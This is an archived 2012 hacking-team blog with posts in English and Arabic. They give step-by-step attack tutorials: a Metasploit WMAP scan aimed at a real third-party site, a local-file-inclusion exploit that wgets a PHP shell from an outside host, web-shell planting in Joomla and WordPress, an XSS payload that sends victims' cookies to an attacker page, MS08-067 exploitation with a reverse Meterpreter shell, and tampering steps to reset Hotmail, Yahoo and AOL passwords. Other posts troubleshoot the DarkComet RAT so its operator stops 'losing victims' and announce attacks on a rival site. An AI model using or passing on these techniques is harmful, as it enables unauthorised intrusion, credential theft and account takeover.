cobra-team: 2012

السبت، 15 ديسمبر 2012

WMAP WEB SCANNER METASPLOIT

ur0b0r0x@consolex_ /opt/metasploit-4.4.0/msf3 $ msfconsole

     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 951 exploits - 506 auxiliary - 152 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops

msf > db_connect -y /opt/metasploit-4.4.0/config/database.yml
msf > load wmap

.-.-.-..-.-.-..---..---.
| | | || | | || | || |-'
`-----'`-'-'-'`-^-'`-'
[WMAP 1.5.1] ===  et [  ] metasploit.com 2012
[*] Successfully loaded plugin: wmap

msf > wmap_sites -a www.microsoft.com,http://65.55.58.201/
[*] Site created.
msf > wmap_sites -l
[*] Available sites
===============

 Id  Host             Vhost                Port  Proto  # Pages  # Forms
 --  ----             -----                ----  -----  -------  -------
 0   65.55.58.201     www.microsoft.com    80    http   0        0

msf > wmap_sites -s 0 1
    [www.microsoft.com] (65.55.58.201)
msf > wmap_targets -t microsoft.com,http://65.55.58.201/
msf > set DOMIAN www.microsoft.com
DOMIAN => www.microsoft.com 
msf > wmap_targets  -d 0
[*] Loading www.microsoft.com,http://65.55.58.201:80/.
msf > wmap_targets  -l
[*] Defined targets
===============

     Id  Vhost              Host          Port  SSL    Path
     --  -----              ----          ----  ---    ----
     0   www.microsoft.com  65.55.58.201  80    false    /

msf > wmap_run -t
[*] Testing target:
[*]     Site: www.microsoft.com (65.55.58.201)
[*]     Port: 80 SSL: false
============================================================
[*] Testing started. 2012-09-17 17:48:50 -0500
[*] Loading wmap modules...

[*] 38 wmap enabled modules loaded.
[*] 
=[ SSL testing ]=
============================================================
[*] Target is not SSL. SSL modules disabled.
[*] 
=[ Web Server testing ]=
============================================================
[*] Module auxiliary/scanner/http/http_version
[*] Module auxiliary/scanner/http/open_proxy
=[ File/Dir testing ]=
============================================================
[*] Module auxiliary/scanner/http/backup_file
[*] Module auxiliary/scanner/http/brute_dirs
[*] ETC ETC ETC ETC ETC.....
=[ Unique Query testing ]=
============================================================
[*] Module auxiliary/scanner/http/blind_sql_query
[*] Module auxiliary/scanner/http/error_sql_injection
[*] ETC ETC ETC ETC ETC.....

msf > wmap_run -e
[*] Using ALL wmap enabled modules.
[*] Testing target:
[*]     Site: www.microsoft.com (65.55.58.201)
[*]     Port: 80 SSL: false
============================================================
[*] Testing started. 2012-09-17 18:03:07 -0500
[*] 
=[ SSL testing ]=
============================================================
[*] Target is not SSL. SSL modules disabled.
[*] 
=[ Web Server testing ]=
============================================================
[*] Module auxiliary/scanner/http/http_version

[*] 65.55.58.201:80 Microsoft-IIS/7.5 ( Powered by ASP.NET, 301-http://www.microsoft.com )
[*] ETC ETC ETC......

msf > hosts -c address,svcs,vulns

Hosts
=====
address        svcs  vulns
-------        ----  -----
65.55.58.201    1     1
msf > vulns
[*]
  Time: 2012-09-17 18:05:49 UTC Vuln: host=65.55.58.201 port=80 
proto=tcp  name=auxiliary/scanner/http/options  
refs=CVE-2005-3398,CVE-2005-3498,OSVDB-877,BID-11604,BID-9506,BID-9561

الثلاثاء، 11 ديسمبر 2012

Local File Inclusion Vulnerability Demonstration - Web Hacking

Local file inclusion is a very popular web application attack, It was very common few years back. However now a days you will rarely find websites vulnerable to this attack. However a single vulnerability can result in getting your website compromised.

Here are some of the common parameters/dorks which are vulnerable to local file inclusion or remote file inclusion attacks.

index.php?index2=
index.php?homepage=
index.php?page=

Requirements:

1) A Vulnerable Website
2) Remote shell ( http://www.sh3ll.org/egy.txt )
3) User-Agent switcher ( https://addons.mozilla.org/en-US/firefox...-switcher/ )
4) Mozilla Firefox

The first thing which a hacker will do while finding a LFI vulnerability is to locate the /etc/passwd file. This file indicates that a local file inclusion vulnerability is present in the website. The image below explains the whole story “root” is the username, followed by “x” which happens to be the password, however here it’s shadowed, which means that it’s present is /etc/shadow file. Which is only accessible when you have root privileges.

Next the hacker will check for /proc/self/environ. So change your path to /proc/self/environ/. The /proc/self/environ/ page should look something like this if the file exists, not all sites have it.

Once the local file inclusion vulnerability has been identified , the hacker will try to perform remote code execution and try to some how to further acesss. This can be done by uploading a PHP backdoor. For that purpose a commonly used tool is Useragent switcher. Which can be downloaded from the link above.

The hacker edits the useragent and changes code inside to the user agent to the following:

<?php phpinfo();?>

Select your User-Agent in Tools > Default User Agent > PHP Info (Or whatever you User Agent is called)

After refreshing the website, He then searches for the keyword "disable_functions" (Ctrl+F Search function)

disable_functions | no value | no value

The above function tells us that website is vulnerable to remote code execution and now we can upload the PHP backdoor. On the finding that the website is vulnerable he then tries to upload the shell by using the following command:

<?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>

Where the above code uploads a PHP backdoor in a text form and later renames it to .php. Now the shell has been successfully uploaded. Once the PHP backdoor has been uploaded it will look like the following:

Feel free to query for any issue.

الاثنين، 29 أكتوبر 2012

تنفيذ اقوى الهجمات لاكبر موقع هكر داعر v4-team.com

تم بتاريخ اليوم 29-10 تنفيذ اقوى هجمات على سيرفر امان الجرب الموقع المعروف بالتلغيم وسوء الادارة بعد معلومات اكيدة بتلغيم الموقع من قبل الادارة بثغرات الجافا لاختراق الزوار والاعضاء...هناك المزيد من الهجمات فى انتظار الموقع القذر

الثلاثاء، 16 أكتوبر 2012

Uploading Shell in Joomla

Hey all today i will be telling you all about uploading shell in joomla.

So without wasting time lets start our work____!!!

1. Suppose we have an access to joomla admin.

2. After logging in we will get inside the site from where we can edit and do many things with the database. As shown in image below.

3. The go to Extensions and inside that Template Manage. As shown in below image.

4. After getting in template manager we will see all the templates installed on the site.

5. As we can see marking in red it has the star. It shows its the default template used by the sites currently. Select any of the template like i am taking beez.

6. Once we click on beez we will see something as shown in below image.

After that click on Edit html.

7. Once you clicked on edit html you will see something as shown in below image.

As we can see the red part /templates/beez/index.php that is the path of your shell.

9. Now paste your shell code over there and save it.

10. As soon as we click on save. it will take us to page were it will shows Template source saved.

Once that is done we can access our shell. Path of the shell would be

www.site.com/templates/beez/index.php
I hope you all enjoyed this tutorial and if u feel any confusion or problem then you may ask in comments.

Uploading Shell in Wordpress

Hey all in this tutorial i will tell you all how to upload shell in wordpress.

So first of all we must have access to wordpress. As many of you must have tried symlink and got worpress and joomla databases but what about uploading shell in them.
So here we go just follow me

1. Log in to your worpress site and after logging in you will see something shown in below image.

2. On the left hand side you can see editor option under appearance just follow that option.

3. After getting in editor you will see different themes. So select any theme you want and then select template as shown in below image.

4. After selecting theme and template just replace this code with our shell code and then upload file.

5. Now after uploading file it must show File edited successfully and after that go to your shell directory i.e. www.targetsite.com/wp-content/themes/yourtheme/templatename.php.

Our shell is uploaded ;)

I hope you all enjoyed this tutorial and if u feel any confusion or problem then you may ask in comments.

الثلاثاء، 14 أغسطس 2012

ثغرة XSS وطرق الاستفاده منها

ان المواقع المصابة بثغرات ال XSS هي المواقع التي تستطيع التعديل على محتوى مصدرها و ادخال كود javascript أو HTML او PHP
ما يجب ان تعرفه HTML,javascript,PHP

اي ان ثغرة XSS تعني امكانية تعديل محتويات الموقع.....

و معظم هذه الثغرات موجودة في مربعات البحث في المواقع ...

مثلا عنوان صفحة بحث في الموقع او في مربعات الكومنز او الرسائل او مربعات ادخال النصوص.

www.infectedsite.com/search.php?q=word

يكون الموقع قد كتب في صفح البحث جملة "نتائج البحث ل word : ".

و لكن ماذا اذا أدخلنا سكريبت جافا سكريبت في مربع البحث؟

http://www.infectedsite.com/search.php?q=<script>alert("XSS")</script>word

ستكتب صفحة البحث "نتائج البحث ل <script>alert("XSS")</script>word : "

هنا ادرجنا السكريبت في الصفحة و سوف يظهر مربع تنبيه في الصفحة XSS
هذا يعني ان الموقع مصاب بثغرة XSS
لماذا يكون الموقع مصابا بها ؟
لأن مبرمجي الموقع كسولين جدا ليفلترو كلمة البحث من الرموز المميزة مثل #@$%^,.<>
ليمنعو من إدخال كود javascript او HTML
هناك نوعين من ثغرات الXSS
النوع الدائم :
يكون هذا النوع غالبا في مربعات الكومنتز و التعليقات .
حيث في مربع التعليق على موقع ما ندخل مثلا كود جافا سكريبت .

و سوف يحفظ التعليق في الصفحة أي سنحفظ كود الجافا سكريبت بشكل دائم بالصفحة

النوع المؤقت :

يكون النوع المؤقت غالبا في صفحات البحث حيث لا نستطيع ادراج الكود بشكل دائم و لكن نستطيع إدراجه فقط عن طريق رابط البحث مثل المثال السابق

http://www.infectedsite.com/search.php?q=<script>alert("XSS")</script>word
ما الفائدة من ثغرات XSS و كيف نستطيع اختراق الموقع عن طريقها ؟
هناك الكثير من الطرق لإختراق الموقع عن طريق ثغرات XSS
أهمها سرقة الكوكيز
تحتاج الى استضافة موقع تدعم PHP
ننشئ صفحة PHP مثال stealer.php
تقوم هذه الصفحة بكتابة الكلمات التي تردها بطريقة GET
الكود :

<?php

$data=$_GET["c"]

$f=open("cookies.tct","w")

$f.write($data)

$f.close()

هذه الصفحة سوف تكتب البيانات التي تردها الى ملف cookies.txt و البيانات التي سنعطيها اياها هي الكوكيز عن طريق ادخال كود جافا سكريبت عن طريق الثغرة مثال في الثغرات المؤقتة في طريقة البحث :

http://www.infectedsite.com/search.php?q=<script>document.location("http://ypursite.com/stealer.php?c="+document.cookie);</script>

هنا دمجنا السكريبت

هذا الكود سيحول الضية الى موقعك و يعطي الصفحة التي ستكتب الكووكيز قيمو الكوكيز عن طريق الأمر

document.cookie

هنا اذا فتحنا الملف

http://yoursite.com/cookies.txt

ستجد الككيز للمستخدم مكتوبة فيها

اما في الثغرات الدائمة فيكفي ادخال الكود

ليسرق الكوكيز

و أيضا في الثغرات الدائمة نستطيع ان نحول متصفح الموقع المصاب بالثغرة XSS

عن طريق سكريبت

Document.location

الأربعاء، 6 يونيو 2012

حل مشكلة فقدان ضحايا برنامج darkcomet-rat

شكى لى عدد من الاصدقاء مشكلة فى برنامج darkcomet وهى مشكلة فقدان الضحايا

والحل بسيط فقط اتبع الاعداد الصحيح وليس السبب هو التشفير كما يشاع

وسبب المشكلة هو عدم وضع pass كما هو موضح فى الصورة فى الاسفل

Make it look like mine ; Enter your the password you want then save

وايضا يجب وضع pass ولازم يكون مثل pass الذى تم وضعه فى الصورة الاولى

مثلا وضعت كما هو موضح فى الصورة الاولى( pass (12345

انظر الاعداد فى الصورة الثانية يجب وضع pass مطابق لما وضعته فى اعداد الصورة الاولى

Enter the password you put before and click on generate a few times

بعد تطبيق الاعداد الصحيح كما هو موضح فى الدرس لن تواجهك مشكلة فقدان الضحايا

cobra-team

السبت، 26 مايو 2012

Joomla Security Scanner V1.0

A vulnerability scanner made specifically for Joomla!
Finds vulnerabilities for the following..

1. XSS
2. SQL Injection
3. CSRF
4. RFI
5. LFI
6. Brute Force

Detection ratio: 1 / 42

https://www.virustotal.com/file/e29ea664...338010750/

You can download the program via direct link here - http://lnk.co/I1CAD

الخميس، 24 مايو 2012

How to Update to Metasploit 4 and use Autopwn in Backtrack 5

Well, given the recent release of Backtrack 5, and the recent release of Metasploit 4, and knowing how popular the super-quick-and-dirty Autopwn function is, I thought I'd write up a brief instructional on how to get Metasploit 4 up and running on Backtrack 5, and how to use the Autopwn function with it, for those who can't figure it out for themselves.

First thing's first, we need to update Metasploit. Do so by first opening a terminal, then type the following to change into the appropriate directory and update:

cd /pentest/exploits/framework3/
./msfupdate

Next, to have databases working appropriately, we need have the environment set properly, and to do that, we need to run the msfconsole with the following command:

/usr/local/bin/msfconsole

Now, we need to check to make sure that our database drivers are loaded. Type:

db_status

You should receive a response saying "postgresql connected to msf3". Now, we need to nmap the host:

db_nmap -sS -sV -T 5 -P0 -O 172.16.40.43

I only have SSH open on mine, as I was scanning my work laptop, so this will not be vulnerable to any exploits in Metasploit either, unfortunately. I did not have quick access to any vulnerable machines to use for this demo. As you may have noticed, I also used a loud and thorough scan on this one - feel free to modify this to suit your needs with any nmap-friendly flags.

Finally, once the scan is complete, exploit with:

db_autopwn -p -e -t

Or whatever your favourite flags are for this. Then, you watch it all go by, and hoepfully at the end, you have a session. Don't forget, to use it:

sessions -l
sessions -i 1

Happy testing! Click here for the quick reference version.

الأربعاء، 9 مايو 2012

قريبا اقوى الهجمات لاكبر موقع هكر داعر v4-team.com

الاثنين، 30 أبريل 2012

ms08_067_netapi Metasploit Attack

This tutorial I made for the new to Security & Backtrack users on the Top-Hat-Sec forums and My blog to get them familiar with the Metasploit console and maybe get them through penetrating their first system This has to be run on an unpatched XP machine or VM with I believe only SP1 if I’m not mistaken.

First open netdiscover to discover the attacking machine on your network. You can do this by just running that command alone into terminal or get more detailed and run it like this

netdiscover -i eth0 -r 192.168.0.1/24

with the output something like mine

Now open up a Metasploit console typing in terminal

msfconsole

Now we want to do a search for all exploits that have to do woth netapi so we run that serch with the command below

search netapi

You’ll want to run the exploit I highlited in this screenshot

exploit/windows/smb/ms08_067_netapi

Now type

show options to show all of the available options to set for this exploit

show options

Now lets set our Remote Host “Machine we are attacking” —->Victims PC

set RHOST 192.168.0.101

Now we want to set the payload for the exploit by typing in the command below

set PAYLOAD windows/meterpreter/reverse_tcp

Now we need to set the Local host which would be our machine —> “The Attackers Machine “you”

set LHOST 192.168.0.100

Last but not least we will type in the command below to begin exploiting the system

exploit

If all works well you should see a “Meterpreter session 1 started And a Meterpreter prompt below that. Thats it you are now inside the victims machine and can run and Meterpreter commands to continue exploiting the machine. Hopefully you guys find my tutorials usefull and I’ll make some more on SET and others in the near future. Thanks for checking it out.

الأحد، 29 أبريل 2012

WebSploit Toolkit 1.6

WebSploit Is An Open Source Project For Scan And Analysis Remote System From Vulnerability

Description :
[+]Autopwn - Used From Metasploit For Scan and Exploit Target Service
[+]wmap - Scan,Crawler Target Used From Metasploit wmap plugin
[+]format infector - inject reverse & bind payload into file format
[+]phpmyadmin - Search Target phpmyadmin login page
[+]lfi - Scan,Bypass local file inclusion Vulnerability & can be bypass some WAF
[+]apache users - search server username directory (if use from apache webserver)
[+]Dir Bruter - brute target directory with wordlist
[+]admin finder - search admin & login page of target
[+]MLITM Attack - Man Left In The Middle, XSS Phishing Attacks
[+]MITM - Man In The Middle Attack
[+]Java Applet Attack - Java Signed Applet Attack
[+]MFOD Attack Vector - Middle Finger Of Doom Attack Vector
[+]USB Infection Attack - Create Executable Backdoor For Infect USB For Windows

Download Here : Websploit toolkit

السبت، 28 أبريل 2012

Hotmail, AOL and Yahoo Password Reset

1.) Hotmail :

Step 1. Go to this page https://maccount.live.com/ac/resetpwdmain.aspx .
Step 2. Enter the Target Email and enter the 6 characters you see.
Step 3. Start Tamper Data
Step 4 . Delete Element "SendEmail_ContinueCmd"
Step 5. change Element "__V_previousForm" to "ResetOptionForm"
Step 6. Change Element "__viewstate" to "%2FwEXAQUDX19QDwUPTmV3UGFzc3dvcmRGb3JtZMw%2BEPFW%2Fak6gMIVsxSlDMZxkMkI"
Step 7. Click O.K and Type THe new Password
Step 8. sTart TamperDaTa and Add Element "__V_SecretAnswerProof" Proof not constant Like the old Exploit "++++" You need new Proof Every Time

2.) Yahoo

Step 1. Go to this page https://edit.yahoo.com/forgot .
Step 2 . EnTer the Target Email . and Enter the 6 characters you see .
Step 3. Start Tamper Data Delete
Step 4. change Element "Stage" to "fe200"
Step 5. Click O.K and Type The new Password
Step 6. Start Tamper Data All in Element Z

Step 7.done

3.) AOL:

Step 1. Go to Reset Page
Step 2. EnTer the Target Email . and Enter the characters you see .
Step 3. Start Tamper Data
Step 4. change Element "action" to "pwdReset"
Step 5. change Element "isSiteStateEncoded" to "false"
Step 6. Click O.K and Type THe new Password
Step 7. Start TamperDaTa All in Element rndNO
Step 8. done